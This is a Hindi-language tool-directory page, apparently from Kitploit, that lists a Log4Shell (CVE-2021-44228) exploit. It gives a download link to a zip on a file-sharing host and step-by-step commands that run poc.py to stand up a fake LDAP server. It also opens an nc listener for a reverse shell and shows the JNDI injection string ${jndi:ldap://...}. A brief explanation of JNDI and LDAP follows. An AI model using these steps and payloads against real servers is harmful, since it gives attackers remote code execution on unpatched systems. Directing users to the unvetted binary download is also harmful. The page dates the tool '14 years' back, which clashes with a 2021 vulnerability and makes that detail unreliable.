Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4j-Exploit-CVE-2021-44228 — CVE-2021-44228 (Log4Shell) के लिए शोषण उपकरण जो एक दुर्भावनापूर्ण LDAP सर्वर स्थापित करता है और कमजोर Log4j अनुप्रयोगों पर रिमोट कोड निष्पादन प्राप्त करने के लिए एक Java पेलोड वितरित करता है। | Kitploit
उपकरण/GitHubGitHub/willian-2-0-0-1/log4j-exploit-cve-2021-44228
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubwillian-2-0-0-1/log4j-exploit-cve-2021-44228

Log4j-Exploit-CVE-2021-44228

CVE-2021-44228 (Log4Shell) के लिए शोषण उपकरण जो एक दुर्भावनापूर्ण LDAP सर्वर स्थापित करता है और कमजोर Log4j अनुप्रयोगों पर रिमोट कोड निष्पादन प्राप्त करने के लिए एक Java पेलोड वितरित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं
साझा करें

Log4j-Exploit-CVE-2021-44228

लॉग4शेल भेद्यता परीक्षण उपकरण https://log4shell.tools/

जावा के साथ ही शोषण शामिल है, खाता बनाने आदि से बचने के लिए..

root@kitploit:~
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
root@kitploit:~
nc -lvnp 9001
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

log4j का मूल अवधारणा

JNDI क्या है

यह एक निर्देशिका सेवा के लिए एक जावा API है जो जावा सॉफ्टवेयर क्लाइंट को एक नाम के माध्यम से डेटा और संसाधनों की खोज और खोज करने की अनुमति देता है।

LDAP क्या है

यह एक निर्देशिका एक्सेस प्रोटोकॉल है। LDAP का उपयोग Docker, Jenkins, Kubernetes, Open VPN और Linux Samba सर्वरों के साथ उपयोगकर्ता नाम और पासवर्ड को मान्य करने के लिए किया जा सकता है। LDAP सिंगल साइन-ऑन का उपयोग सिस्टम प्रशासकों द्वारा LDAP डेटाबेस तक पहुंच को नियंत्रित करने के लिए भी किया जा सकता है।

जो कोई भी दोष के बारे में अधिक जानना चाहता है, उसके लिए नीचे दस्तावेज़ दिया गया है:

https://www.lunasec.io/docs/blog/log4j-zero-day/

जावा के बिना शोषण शामिल है

https://github.com/kozmer/log4j-shell-poc
टूल डाउनलोड करें